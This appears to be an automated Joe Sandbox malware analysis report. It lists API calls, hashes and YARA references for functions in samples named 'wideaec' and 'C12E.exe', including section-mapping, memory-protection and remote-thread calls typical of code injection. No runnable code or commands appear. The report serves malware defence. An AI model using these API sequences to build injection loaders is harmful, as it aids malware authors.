Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 8f69342a498a25bf33f9362e99804d6d805f6cc08e10f7a952bbbdd345a8224a
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: AF527874A00229DFDB64CF58C995BA8BBB1BF09314F1480D9E90DAB351DB30AE89DF54

Function 00416AE6 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 68
libraryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNELBASE(00418374), ref: 00416B12
MoveFileA.KERNEL32(00000000,00000000), ref: 00416B47
InterlockedDecrement.KERNEL32(?), ref: 00416B6A

Strings

k`, xrefs: 00416B4D
}$, xrefs: 00416B71

Memory Dump Source

Source File: 00000005.00000002.2053825637.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_40b000_wideaec.jbxd

Similarity

API ID: DecrementFileInterlockedLibraryLoadMove
String ID: k`$}$
API String ID: 418655872-956986773
Opcode ID: 43f99f8ac428f16e081c033c36405718f082dd07f42b23fb4eed68b588b4d0ee
Instruction ID: 42061d5068bdce50c1bf5091c343343de5c0ff0e781990f509a1e5bc66fdcea5
Opcode Fuzzy Hash: 43f99f8ac428f16e081c033c36405718f082dd07f42b23fb4eed68b588b4d0ee
Instruction Fuzzy Hash: AB2126349882208BCB20DB60DC457DABB60FB48319F1244BFEA49D7290CA38ADC4C79D

Function 004164D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00511CE8), ref: 004165AF
GetProcAddress.KERNEL32(00000000,0041C210), ref: 004165EC
VirtualProtect.KERNELBASE(00511B2C,00511CE4,00000040,?), ref: 0041660B

Strings

, xrefs: 00416515

Memory Dump Source

Source File: 00000005.00000002.2053825637.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_40b000_wideaec.jbxd

Similarity

API ID: AddressHandleModuleProcProtectVirtual
String ID:
API String ID: 2099061454-3916222277
Opcode ID: ed8495ad91114ca58db7b4743c9787d6e3477e2d90cf241a67db01d1f531d50d
Instruction ID: 5d6b8529abac6a2ef6dc9a1a277ef6d20b5afcabe6b96dcf33e4d09f3920d241
Opcode Fuzzy Hash: ed8495ad91114ca58db7b4743c9787d6e3477e2d90cf241a67db01d1f531d50d
Instruction Fuzzy Hash: 00310310AD8781CBE301CBE8FC447813A62AB35748F04C0E89648873B5D7BE5A58D7AE

Function 007108E3 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0071090B
Module32First.KERNEL32(00000000,00000224), ref: 0071092B

Memory Dump Source

Source File: 00000005.00000002.2054076985.000000000070D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0070D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_70d000_wideaec.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: c7b0d681e4a82b50acb239e41765b5d62651ddeacb34ecb7d7ad7fb1b2930157
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: B3F06235500715AFE7202ABD989DBAE76ECAF59724F104528E642910C1DAB8E8C54AA1

Function 00630E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,00630223,?,?), ref: 00630E19
SetErrorMode.KERNELBASE(00000000,?,?,00630223,?,?), ref: 00630E1E

Memory Dump Source

Source File: 00000005.00000002.2053936482.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_630000_wideaec.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 4b3f2dadeb50f47f9dffb3410bc12ca49dcb814039e7263dfb2ecc5297b295b0
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 9ED0123124512877D7003A94DC09BCD7B1CDF05B62F008411FB0DD9180C770994046E5

Function 004018E6 Relevance: 1.3, APIs: 1, Instructions: 63
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000005.00000002.2053804160.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_wideaec.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
Opcode Fuzzy Hash: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F

Function 00401915 Relevance: 1.3, APIs: 1, Instructions: 59
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000005.00000002.2053804160.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_wideaec.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
Opcode Fuzzy Hash: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F

Function 004018F1 Relevance: 1.3, APIs: 1, Instructions: 55
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000005.00000002.2053804160.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_wideaec.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
Opcode Fuzzy Hash: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F

Function 00401912 Relevance: 1.3, APIs: 1, Instructions: 52sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000005.00000002.2053804160.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_wideaec.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
Opcode Fuzzy Hash: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F

Function 007105A2 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 007105F3

Memory Dump Source

Source File: 00000005.00000002.2054076985.000000000070D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0070D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_70d000_wideaec.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 05a5d8fe60bf6968835a1a2227664a0498a28b66049bddd7a88b3a89095f9049
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: F2113F79A00208EFDB01DF98C985E98BBF5EF08351F058094F9489B361D375EA90DF90

Function 00401925 Relevance: 1.3, APIs: 1, Instructions: 46sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000005.00000002.2053804160.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_wideaec.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
Opcode Fuzzy Hash: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F

Function 004164A0 Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNELBASE(00000000,00511CE4,00416AC7), ref: 004164A8

Memory Dump Source

Source File: 00000005.00000002.2053825637.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_40b000_wideaec.jbxd

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: f108658839a774f3ec8041a38e7b5c842f30d111f5bdb726fd1b9c974fc00c67
Instruction ID: 0e1443596e4cadc07de741eab66e71947b5663c851de1fa4f156f6081f94fab8
Opcode Fuzzy Hash: f108658839a774f3ec8041a38e7b5c842f30d111f5bdb726fd1b9c974fc00c67
Instruction Fuzzy Hash: 95B092B41896009BD2008BB0AD04BD03AA4A318302F008191F700C51A0DA201808AF1C

Non-executed Functions

Function 00416720 Relevance: 6.0, APIs: 4, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

QueryDosDeviceA.KERNEL32(00000000,?,00000000), ref: 00416754
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041676F
HeapDestroy.KERNEL32(00000000), ref: 0041678E
GetNumaProcessorNode.KERNEL32(?,00000000), ref: 0041679D

Memory Dump Source

Source File: 00000005.00000002.2053825637.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_40b000_wideaec.jbxd

Similarity

API ID: DestroyDeviceEnvironmentFreeHeapNodeNumaProcessorQueryStrings
String ID:
API String ID: 4159173863-0
Opcode ID: b64c93f38c0632519a7331ea2ffcdac579a561a96d48f66aef6059a363055a99
Instruction ID: bfda60e46cdd917eef3824eff81274299ff88806db2d43078e848f831fad2497
Opcode Fuzzy Hash: b64c93f38c0632519a7331ea2ffcdac579a561a96d48f66aef6059a363055a99
Instruction Fuzzy Hash: B301B1716852049BD710EBA4ED45BDA7B78A70C31AF0040A6F709D62D0DA3499888B6E

Analysis Process: C12E.exePID: 7924, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	6.9%
Dynamic/Decrypted Code Coverage:	28.6%
Signature Coverage:	0%
Total number of Nodes:	168
Total number of Limit Nodes:	7

Executed Functions

Function 00416EC0 Relevance: 49.3, APIs: 26, Strings: 2, Instructions: 299
windowtimefileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00416FDA
GetFocus.USER32 ref: 00416FE0
ReadConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00416FED
FindAtomW.KERNEL32(00000000), ref: 00416FF4
SetConsoleMode.KERNEL32(00000000,00000000), ref: 00416FFC
GetDefaultCommConfigA.KERNEL32(00000000,?,00000000), ref: 00417023
CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 0041702C
CreatePipe.KERNEL32(?,00000000,00000000,00000000), ref: 00417042
GetEnvironmentStringsW.KERNEL32 ref: 00417048
ReadConsoleOutputA.KERNEL32(00000000,?,?,?,?), ref: 0041708D
GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 0041709C
GetSystemTimeAdjustment.KERNEL32(00000000,00000000,00000000), ref: 004170A5
ObjectPrivilegeAuditAlarmA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 004170BA
ReleaseMutex.KERNEL32(00000000), ref: 004170CA
SetCommState.KERNELBASE(00000000,00000000), ref: 004170F4
GetConsoleAliasesLengthW.KERNEL32(00000000), ref: 00417125
GetComputerNameW.KERNEL32(?,?), ref: 00417139
GetFileAttributesA.KERNEL32(00000000), ref: 00417140
GetConsoleAliasExesLengthA.KERNEL32 ref: 00417146
GetBinaryType.KERNEL32(0041934C,?), ref: 00417158
FormatMessageA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0041716B
GetLongPathNameW.KERNEL32(00419360,?,00000000), ref: 0041717E
GetCommTimeouts.KERNEL32(00000000,00000000), ref: 00417186
LoadLibraryW.KERNELBASE(00419374), ref: 00417212

Strings

}$, xrefs: 00417271
k`, xrefs: 0041724D

Memory Dump Source

Source File: 00000006.00000002.2399225026.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_C12E.jbxd

Similarity

API ID: Console$CommFileName$LengthRead$AdjustmentAlarmAliasAliasesAtomAttributesAuditBinaryCompareComputerConfigCopyCreateDefaultEnvironmentExchangeExesFindFocusFormatInterlockedLibraryLoadLongMessageModeModuleMutexObjectOutputPathPipePrivilegeReleaseStateStringsSystemTimeTimeoutsType
String ID: k`$}$
API String ID: 4079765171-956986773
Opcode ID: e48a6f0bb2816fd1668c4873402b9e0f65a5613ee82e10785e95a09dc4e62c78
Instruction ID: bd4547cb626b20a29bef7dd1c272b8299b50ccc80d2d00de4cf5370715da157f
Opcode Fuzzy Hash: e48a6f0bb2816fd1668c4873402b9e0f65a5613ee82e10785e95a09dc4e62c78
Instruction Fuzzy Hash: 06A1C171801128ABC724DB61EC45BDF7B78EF5D314F0181AEF609A3160DB385A89CBAD

Function 004014C4 Relevance: 10.8, APIs: 7, Instructions: 277
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000006.00000002.2399203542.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C12E.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c781147eb40cf50f9b808a26197604c885e6d7acefaf94bd50111952dd5c1550
Instruction ID: a2440897234d9063cbd2a71cb92c382042c3cd10596cdc4f18a7c269882a1901
Opcode Fuzzy Hash: c781147eb40cf50f9b808a26197604c885e6d7acefaf94bd50111952dd5c1550
Instruction Fuzzy Hash: 0981D5B4504244FBDB208F95CC49FEB7BB8EF81740F20416BF902BA1E5D6749902DB66

Function 004015D5 Relevance: 10.7, APIs: 7, Instructions: 166
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771

Memory Dump Source

Source File: 00000006.00000002.2399203542.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C12E.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: ad48f6f44a2631cca022906d065bca6458850cc5bc24c7cb6bd5a1b8da74fc92
Instruction ID: 5b275a0397ac31cab10c66c3112b8ecfdbc4447489e22d1c2cba3eb21d005058
Opcode Fuzzy Hash: ad48f6f44a2631cca022906d065bca6458850cc5bc24c7cb6bd5a1b8da74fc92
Instruction Fuzzy Hash: 8251F9B5900245BBEB208F91CC48FEF7BB8EF85710F10416AFA11BA2A5D7759941CB64

Function 004015DF Relevance: 10.7, APIs: 7, Instructions: 164
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771

Memory Dump Source

Source File: 00000006.00000002.2399203542.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C12E.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 44c0db395121e6769fce0a0aa4e09f1bf5d5ed1a6152a03509b78bf3449358c6
Instruction ID: aa7ad941c6157971e71dc2736092b98b642c15495c2c07021be349f0f8194e9f
Opcode Fuzzy Hash: 44c0db395121e6769fce0a0aa4e09f1bf5d5ed1a6152a03509b78bf3449358c6
Instruction Fuzzy Hash: 4D51FAB5900249BBEB208F91CC48FEF7BB8EF85710F10015AFA11BA2A5D7749945CB64

Function 004015F2 Relevance: 10.7, APIs: 7, Instructions: 164
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771

Memory Dump Source

Source File: 00000006.00000002.2399203542.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C12E.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: c30ea274402ef54bc02bb138cff093cc3ebd3018c4b2b801df8b24d7e4f91f61
Instruction ID: 51677960ee3875d5e78d4b2c0b9a124aae989836c1cf5ff6a0c78d9f2f0b6c9a
Opcode Fuzzy Hash: c30ea274402ef54bc02bb138cff093cc3ebd3018c4b2b801df8b24d7e4f91f61
Instruction Fuzzy Hash: 8E51FAB5900249BBEB208F91CC48FAFBBB8EF85710F10415AF911BA2A5D7759941CB64

Function 004015E6 Relevance: 10.7, APIs: 7, Instructions: 163
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771

Memory Dump Source

Source File: 00000006.00000002.2399203542.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C12E.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: ff9639ba48af835a0036563bc059b505b16d709b75bd7c76b087d7be9fc5f6d4
Instruction ID: 771dbcf6e2504e630b0d67c3c545d31db11f89db77175d6a648901ef483dfe93
Opcode Fuzzy Hash: ff9639ba48af835a0036563bc059b505b16d709b75bd7c76b087d7be9fc5f6d4
Instruction Fuzzy Hash: 5451F9B5900249BFEB208F91CC48FEFBBB8EF85B10F100159F911BA2A5D7709945CB64

Function 00403043 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 00403177
NtTerminateProcess.NTDLL ref: 00403190

Memory Dump Source

Source File: 00000006.00000002.2399203542.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C12E.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction ID: 174b4c01c38e91558bfb09f2734ea8af57ab2b253068959c7a4b5a028629c542
Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction Fuzzy Hash: 2D415A31218E084FD768EF5CA84976277D5FB98311F6A43BAE809D7385EA34DC1183C9

Function 0216003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0216024D

Strings

cess, xrefs: 0216018D
kernel32.dll, xrefs: 0216008F, 02160095

Memory Dump Source

Source File: 00000006.00000002.2399579094.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2160000_C12E.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: b5ed4fde32294e7aa38a0e3cc414e3c7c438f795dd78e2fb808d139c398ac453
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 82526974A41229DFDB64CF58C984BACBBB1BF09304F1580E9E94DAB351DB30AA95CF14

Function 004171E6 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 68
libraryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNELBASE(00419374), ref: 00417212
MoveFileA.KERNEL32(00000000,00000000), ref: 00417247
InterlockedDecrement.KERNEL32(?), ref: 0041726A

Strings

}$, xrefs: 00417271
k`, xrefs: 0041724D

Memory Dump Source

Source File: 00000006.00000002.2399225026.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_C12E.jbxd

Similarity

API ID: DecrementFileInterlockedLibraryLoadMove
String ID: k`$}$
API String ID: 418655872-956986773
Opcode ID: 055f0f7ffecc5e23c9486112f5e49b18cc2ee72d9957fe011b2854fbba01f6c3
Instruction ID: bc3d966121456f33088ba0261fb492972a46eee307fae20126fe30775f8c93fb
Opcode Fuzzy Hash: 055f0f7ffecc5e23c9486112f5e49b18cc2ee72d9957fe011b2854fbba01f6c3
Instruction Fuzzy Hash: 862123349482148BCB349B60DC467DABB70FB58315F1244AFEA4997290CA3C5CD98799

Function 00416BD0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00512CE8), ref: 00416CAF
GetProcAddress.KERNEL32(00000000,0041D210), ref: 00416CEC
VirtualProtect.KERNELBASE(00512B2C,00512CE4,00000040,?), ref: 00416D0B

Strings

, xrefs: 00416C15

Memory Dump Source

Source File: 00000006.00000002.2399225026.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_C12E.jbxd

Similarity

API ID: AddressHandleModuleProcProtectVirtual
String ID:
API String ID: 2099061454-3916222277
Opcode ID: 43fa53ae4941edb72a049257c50d8535ae3816ba3e3ed060ecaf81b53e097827
Instruction ID: d8462089c25fc9d344aee2fc6fb1be1e63980dafba0cd980b71d8e6a5f25c2b5
Opcode Fuzzy Hash: 43fa53ae4941edb72a049257c50d8535ae3816ba3e3ed060ecaf81b53e097827
